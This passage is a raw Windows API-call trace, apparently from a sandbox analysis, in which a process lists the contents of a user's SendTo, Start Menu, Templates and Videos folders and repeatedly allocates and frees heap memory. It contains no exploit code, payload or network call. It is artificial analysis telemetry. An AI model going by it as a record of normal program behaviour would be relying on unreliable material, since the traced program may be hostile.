dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.639] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.639] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.639] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0175.639] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0175.639] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0175.640] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.640] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.640] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0175.640] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.641] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.641] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.641] PathFindFileNameW (pszPath="") returned="" [0175.641] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0175.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.641] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.641] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0175.641] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.642] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.642] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.642] PathFindFileNameW (pszPath="") returned="" [0175.642] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0175.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.642] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.642] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0175.642] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.642] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.642] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.643] PathFindFileNameW (pszPath="") returned="" [0175.643] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0175.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.643] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.643] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0175.643] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.643] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.643] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.643] PathFindFileNameW (pszPath="") returned="" [0175.643] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.644] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.644] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-DwrKzslsF2", cAlternateFileName="-DWRKZ~1")) returned 1 [0175.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0175.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0175.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935b90b0, ftCreationTime.dwHighDateTime=0x1d8a4bf, ftLastAccessTime.dwLowDateTime=0xfdb39df0, ftLastAccessTime.dwHighDateTime=0x1d8a4e6, ftLastWriteTime.dwLowDateTime=0xfdb39df0, ftLastWriteTime.dwHighDateTime=0x1d8a4e6, nFileSizeHigh=0x0, nFileSizeLow=0xf836, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7oqi8LaYkzM3PzQg.flv", cAlternateFileName="7OQI8L~1.FLV")) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd33180, ftCreationTime.dwHighDateTime=0x1d8a4da, ftLastAccessTime.dwLowDateTime=0xc9055630, ftLastAccessTime.dwHighDateTime=0x1d8a634, ftLastWriteTime.dwLowDateTime=0xc9055630, ftLastWriteTime.dwHighDateTime=0x1d8a634, nFileSizeHigh=0x0, nFileSizeLow=0x7cb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HDnGwo1W3X7Qq9.flv", cAlternateFileName="HDNGWO~1.FLV")) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb72eb6b0, ftCreationTime.dwHighDateTime=0x1d8a105, ftLastAccessTime.dwLowDateTime=0x1bbd4940, ftLastAccessTime.dwHighDateTime=0x1d8a492, ftLastWriteTime.dwLowDateTime=0x1bbd4940, ftLastWriteTime.dwHighDateTime=0x1d8a492, nFileSizeHigh=0x0, nFileSizeLow=0x41a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7uNQ0 Vl v.flv", cAlternateFileName="U7UNQ0~1.FLV")) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237ede80, ftCreationTime.dwHighDateTime=0x1d8a5cf, ftLastAccessTime.dwLowDateTime=0xd7765030, ftLastAccessTime.dwHighDateTime=0x1d8a5f7, ftLastWriteTime.dwLowDateTime=0xd7765030, ftLastWriteTime.dwHighDateTime=0x1d8a5f7, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsiZz5vLNleCVW.mp4", cAlternateFileName="USIZZ5~1.MP4")) returned 1 [0175.645] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237ede80, ftCreationTime.dwHighDateTime=0x1d8a5cf, ftLastAccessTime.dwLowDateTime=0xd7765030, ftLastAccessTime.dwHighDateTime=0x1d8a5f7, ftLastWriteTime.dwLowDateTime=0xd7765030, ftLastWriteTime.dwHighDateTime=0x1d8a5f7, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsiZz5vLNleCVW.mp4", cAlternateFileName="USIZZ5~1.MP4")) returned 0 [0175.645] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307a8 | out: hHeap=0x6a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30760 | out: hHeap=0x6a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d306d0 | out: hHeap=0x6a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a30 | out: hHeap=0x6a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a78 | out: hHeap=0x6a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30ac0 | out: hHeap=0x6a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b08 | out: hHeap=0x6a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b50 | out: hHeap=0x6a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b98 | out: hHeap=0x6a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30be0 | out: hHeap=0x6a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c28 | out: hHeap=0x6a0000) returned 1 [0175.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c70 | out: hHeap=0x6a0000) returned 1 [0175.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30cb8 | out: hHeap=0x6a0000) returned 1 [0175.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d00 | out: hHeap=0x6a0000) returned 1 [0175.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d48 | out: hHeap=0x6a0000) returned 1 [0175.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0175.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2feb8 | out: hHeap=0x6a0000) returned 1 [0175.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0175.652] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0175.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0175.660] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.663] 